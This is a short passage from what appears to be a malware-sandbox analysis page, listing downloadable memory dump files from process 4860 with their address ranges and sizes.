Filesize
4KB

Download
memory/4860-110-0x00000221AA1F0000-0x00000221AA294000-memory.dmp

Filesize
656KB

Download
memory/4860-144-0x00000221AA1F0000-0x00000221AA294000-memory.dmp

Filesize
656KB

Download